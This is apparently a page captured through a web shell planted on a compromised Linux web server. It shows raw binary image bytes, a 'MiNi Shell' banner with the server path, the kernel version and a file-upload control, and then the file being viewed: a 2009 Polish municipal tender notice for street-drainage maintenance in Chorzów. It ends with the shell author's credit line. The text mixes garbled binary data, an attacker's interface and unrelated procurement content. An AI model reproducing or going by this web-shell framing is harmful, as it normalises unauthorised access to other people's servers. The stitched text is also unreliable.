JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090323/53465-N-2009.html

<p class="kh_header"><b>Chorzów: Bieżące utrzymanie urządzeń odwodnienia ulicznego  na terenie miasta Chorzowa w okresie 36 miesięcy od dnia podpisania umowy obejmujące następującą część miasta:Zad.1/ Chorzów Batory</b><br>
<b>Numer ogłoszenia: 53465 - 2009; data zamieszczenia: 23.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Ulic i Mostów , ul. Katowicka 105, 41-500 Chorzów, woj. śląskie, tel. (032) 2411270, 2411-279, faks 032 2414060.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzuim.chorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie urządzeń odwodnienia ulicznego  na terenie miasta Chorzowa w okresie 36 miesięcy od dnia podpisania umowy obejmujące następującą część miasta:Zad.1/ Chorzów Batory.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Bieżące utrzymanie urządzeń odwodnienia ulicznego  na terenie miasta Chorzowa w okresie 36 miesięcy od dnia podpisania umowy obejmujące następującą część miasta:Zad.1/ Chorzów Batory
Zakres rzeczowy bieżącego utrzymania urządzeń odwodnienia ulicznego został określony w załączniku  Nr 1do Specyfikacji Istotnych Warunków Zamówienia.
Ilość wpustów deszczowych wraz z przykanalikami  wynosi dla  Zad.1/  -  847szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.64.10.00-2, 90.64.20.00-9, 45.23.24.53-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości :
Zad. 1 - 4 500,00 zł  (słownie: cztery tysiące pięćset zł  00/100). 
1. Wadium może być wniesione: 
1.1w pieniądzu - przelewem na rachunek bankowy Zamawiającego:
Miejski Zarząd Ulic i Mostów w Chorzowie, ul. Katowicka 105  Nr rachunku: 
ING Bank Śląski S.A. o/Chorzów Nr 72 1050 1243 1000 0010 0000 3770
Uwaga: za datę wniesienia wadium w tej formie uważa się datę wpływu środków   
pieniężnych na konto Zamawiającego.Do oferty należy dołączyć kopię polecenia przelewu.
1.2w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
1.3w gwarancjach bankowych,
1.4 w gwarancjach ubezpieczeniowych, 
1.5 w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).Uwaga: wadium wnoszone w postaci niepieniężnej (oryginały) należy zdeponować  w Dziale Księgowości tut. Zarządu 
2.W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać  następujące elementy:  
a)nazwę dającego zlecenie (Wykonawcy), nazwę beneficjenta gwarancji (Zamawiającego), nazwę gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją
c) kwotę gwarancji,
d) termin ważności gwarancji,  
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji  na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca,  którego ofertę wybrano:
-odmówił podpisania umowy na warunkach określonych w ofercie, 
-nie wniósł zabezpieczenia należytego wykonania umowy, 
-zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy
3.Wadium wraz z odsetkami wniesione w pieniądzu przez Wykonawcę, którego oferta została uznana za najkorzystniejszą, na jego wniosek zaliczane jest przez Zamawiającego na poczet zabezpieczenia należytego wykonania umowy.
4.Zamawiający dokona zwrotu wadium w  następujących sytuacjach:
4.1upłynął termin związania ofertą,
4.2zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie 
należytego wykonania tej umowy,
4.3Zamawiający unieważnił postępowanie, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
5.Z zastrzeżeniem art. 46 ust. 4a ustawy - Prawo zamówień publicznych, Zamawiający zwróci wadium na wniosek Wykonawcy:
5.1 który wycofał ofertę przed upływem terminu składania ofert ,
5.2 który został wykluczony z postępowania,
5.3 którego oferta została odrzucona
5.4 Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym 
zwrócono wadium na podstawie pkt.5.2 i pkt.5.3, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia Wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
6.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie , o którym mowa w art. 26 ust.3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
7.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
7.1odmówił podpisania umowy na warunkach określonych w ofercie;
7.2nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
7.3zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
przyczyn  leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy:
1.Spełniają warunki określone w art. 22 ust.1 ustawy - Prawo zamówień publicznych.2.Nie podlegają wykluczeniu  z postępowania na podstawie art.24 ust.1 i 2 ustawy-Prawo zamówień publicznych.3.Złożą ofertę zgodną z przepisami prawa i  niniejszą Specyfikacją Istotnych Warunków Zamówienia.4.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, zgodnie z art. 23 ustawy Pzp
a)Wykonawcy występujący wspólnie , winni ustanowić (pisemnie) pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego
b)każdy z podmiotów składających ofertę wspólną (łączną) musi złożyć wszelkie  dokumenty, o których mowa w SIWZ. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia załączniki Nr 2, Nr 3, 
Nr 4, do oferty mogą być złożone wspólnie przez wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego
c)oświadczenie o spełnianiu warunków wskazanych w art. 22 ust.1 pkt. 1-3 ustawy może złożyć pełnomocnik konsorcjum w imieniu wszystkich jego członków
d)oświadczenie o spełnianiu warunku wskazanego w art. 22 ust.1pkt. 4 ustawy składa każdy z podmiotów składających ofertę wspólną (łączną)
e)wniesione wadium w formie niepieniężnej musi wyraźnie wskazywać na wszystkie podmioty składające ofertę wspólną,
f)wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem występującym jako reprezentant pozostałych.
5.Szczegółowe warunki udziału w niniejszym postępowaniu bez względu na ilość wybranych zadań:5.1Warunki dotyczące potencjału technicznego i zawodowego:
a)Wykonawca musi dysponować następującymi osobami posiadającymi wymagane kwalifikacje i posiadający odpowiednie uprawnienia 
- kierownik budowy - 1 osoba   - uprawnienia budowlane w specjalności      
  instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i   
  kanalizacyjnych, oraz  zaświadczenie o przynależności do właściwej Izby   
  Inżynierów Budownictwa
- pozostali pracownicy - nie mniej niż 6 osób
b)Wykonawca powinien  dysponować co najmniej następującym sprzętem:  
- samochodem WUKO - minimalna ilość 1 szt.
- samochodem asenizacyjnym - minimalna ilość 1 szt.
- samochodem skrzyniowym lub samowyładowczy powyżej 5 t - minimalna ilość 
1 szt.
- samochodem skrzyniowym lub samowyładowczym do 5t - minimalna ilość 1 szt.
- piłą do cięcia nawierzchni z mas bitumicznych - minimalna ilość 1 szt.
- wibratorem powierzchniowym - minimalna ilość 1 szt.
c)Wykonawca winien posiadać doświadczenie w wykonywaniu usług 
odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot  zamówienia.
Wykonawca musi wykazać, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, wykonał z należytą starannością niżej wymagane ilości zrealizowanych usług: 
- Wykonawca  musi wykazać wykonanie co najmniej jednej usługi, w ramach której wykonano bieżące utrzymanie urządzeń odwodnienia ulicznego na zlecenie podmiotu, instytucji, gminy, itp. o  wartości nie mniejszej niż 100 000.00 zł brutto w ciągu  roku . Zamawiający uwzględni tylko takie usługi, w ramach których wykonano - prowadzono  bieżące utrzymanie  urządzeń odwadniających na co najmniej dwóch z niżej wymienionych pozycji:
a)kratki wpustowe,b)studzienki rewizyjne i ściekowe,c)studzienki odwadniające mostowe, d)kolektory kanalizacyjne i przykanaliki,e)przepusty pod drogami i zjazdami,f)studnie chłonne,g)wyloty sączków podłużnych i poprzecznych,
h)zamknięte elementy odwodnienia liniowego.
Wykonawcy ubiegający się wspólnie o udzielenie zamówienia muszą wykazać, że:
1.warunek określony w pkt. 5.1 a spełniają łącznie
2.warunek określony w pkt. 5.1 b spełniają łącznie
3.warunek określony w pkt. 5.1 c spełniają łącznie
5.2Warunki ekonomiczne i finansowe:
a)Wykonawca winien dysponować własnymi środkami finansowymi (dopuszczalne jest tu wykazanie środków z kredytu) i/lub zdolność kredytową w wysokości co najmniej 70 000,00  zł. 
b)Wykonawca musi posiadać ubezpieczenie od odpowiedzialności cywilnej w  zakresie prowadzonej działalności gospodarczej na kwotę co najmniej 200 000,00 zł .Wykonawcy ubiegający się wspólnie o udzielenie zamówienia muszą wykazać, że:
1. warunek określony w pkt. 5.2 a spełniają łącznie
2. warunek określony w pkt. 5.2 b spełniają łącznie
5.3Warunek dodatkowy:
Wykonawca zobowiązuje się udzielić gwarancji:
- nie mniejszej niż  6 miesięcy na czyszczenie wpustu wraz z udrożnieniem przykanalika,
- nie mniejszej niż 12 miesięcy na:
a)regulację wpustu,b)wymianę wpustu,c)regulację włazu,d)wymianę włazu,
e)zabudowę nowego wpustu,f)wykonanie przykanalika,g)	uzupełnienie kratki wpustu ulicznego
Stosowny zapis należy dokonać w załączniku Nr 1 - Formularz Ofertowy
Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w pkt. 6 i 7 niniejszej SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń lub dokumentów jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.
1.Wykonawca musi złożyć następujące oświadczenia:
1.1 Oświadczenie, że:-posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają posiadania takich uprawnień,- posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i 
osobami zdolnymi do wykonania zamówienia,- znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.1.2 Oświadczenie, że:
- nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1 i 2 ustawy - Prawo zamówień publicznych.1.3 Oświadczenie, że:
- zapoznał się ze Specyfikacją Istotnych Warunków Zamówienia i nie wnosi do niej 
zastrzeżeń oraz, że zdobył konieczne informacje do przygotowania oferty.
1.4 Oświadczenie, że:- uważa się za związanego z ofertą przez 60 dni od terminu składania ofert i że w razie wyboru jego oferty zobowiązuje się do zawarcia umowy wg wzoru stanowiącego załącznik do Specyfikacji Istotnych Warunków Zamówienia.
2.Dokumenty składane w celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy -Prawo zamówień publicznych.
2.1 aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
ewidencji  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie 
wcześniej niż 6 miesięcy przed upływem terminu składania ofert
2.2 aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie , odroczenie lub rozłożenie na raty  zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.UWAGA: powyższy wymóg dotyczy wyłącznie podmiotów zbiorowych, w  rozumieniu ustawy z dnia 28 października 2002 r. o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary (Dz. U. Nr 197, poz. 1661), nie dotyczy przedsiębiorców będących osobami fizycznymi, w tym spółek cywilnych utworzonych przez osoby fizyczne.
A. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów,  o których mowa  w pkt. 2.1; 2.2 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b)nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub  zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
c)nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
B. Dokumenty, o których mowa w pkt.1 lit. a i c powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
C. Dokument, o którym mowa w pkt. 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
D. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wyżej wymienionych, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty wymienione w pkt.2.1; 2.2 albo odpowiadające im dokumenty określone w Rozporządzeniu Prezesa Rady Ministrów (Dz. U. z 2008r. Nr 188 poz. 1155 ) winny być złożone przez każdego z  Wykonawców.
3.Dokumenty składane w celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania  zamówienia.
3.1Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych jak również wykonywanych, usług w okresie ostatnich trzech  lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającym swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców  oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie ( zgodnie z załącznikiem  Nr 2 ),3.2Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi  dysponuje lub będzie dysponował Wykonawca ( załącznik Nr 3 )  
3.3Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt. 3.2, Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.
3.4Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności   ( załącznik Nr 4) - kierownictwo i personel. Zamawiający wymaga, aby stosowny  załącznik do oferty zawierał dane personalne wszystkich osób, które będą uczestniczyć  w wykonywaniu zamówienia, zarówno pełniących funkcje kierownicze, jak i inne, w  tym także dane wszystkich robotników.
3.5Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, którym mowa w pkt. 3.4, Wykonawca wskazał osoby, którymi będzie dysponował.
3.6 Dokumenty  stwierdzające, że osoby wymienione w pkt. 2.1 a SIWZ, które  będą uczestniczyć w wykonywaniu zamówienia, posiadają  wymagane  uprawnienia.
Dokumenty wymienione w pkt.3.1 ; 3.2; 3.3; 3.4; 3.5 i 3.6 mogą być złożone 
wspólnie przez Wykonawców.
4.Dokumenty składane w celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4.1Aktualną informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzającej  wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4.2Polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. 
Dokumenty wymienione w pkt. 4.1 i 4.2 Wykonawcy składają wspólnie w zawiązku  z tym, że warunek udziału w postępowaniu Wykonawcy winni spełniać łącznie.
Pondto do oferty należy załaczyć:wypełniony formularz ofertowy (załącznik Nr 1),
kosztorysy ofertowe dla każdej  pozycji z  załącznika Nr 1. Powyższe kosztorysy  
pełnią wyłącznie funkcję pomocniczą,dokument wpłaty wadium (kopie przelewu na rachunek bankowy, gwarancji itp.),wypełnione załączniki Nr 2,3,4,wypełnione wzory oświadczeń załączonych do SIWZ. W przypadku Wykonawców działających przez pełnomocnika - pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy. Pełnomocnictwo powinno być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza. W przypadku Wykonawców wspólnie ubiegających się o zamówienie - dokument stwierdzający ustanowienie przez Wykonawców wspólnie ubiegających się o zamówienie pełnomocnika do reprezentowania ich  w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego przedstawiony w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.mzuim.chorzów.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można uzyskać odpłatnie w kwocie 10.00 zł w Miejskim Zarządzie Ulic i Mostów, 41-500 Chorzów, ul. Katowicka 105 lub zostanie przeslana odpłatnie na wniosek Wykonawcy..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.04.2009 godzina 08:45, miejsce: Miejski Zarząd Ulic i Mostów, 41-500 Chorzów, ul. Katowicka 105 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 01.05.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com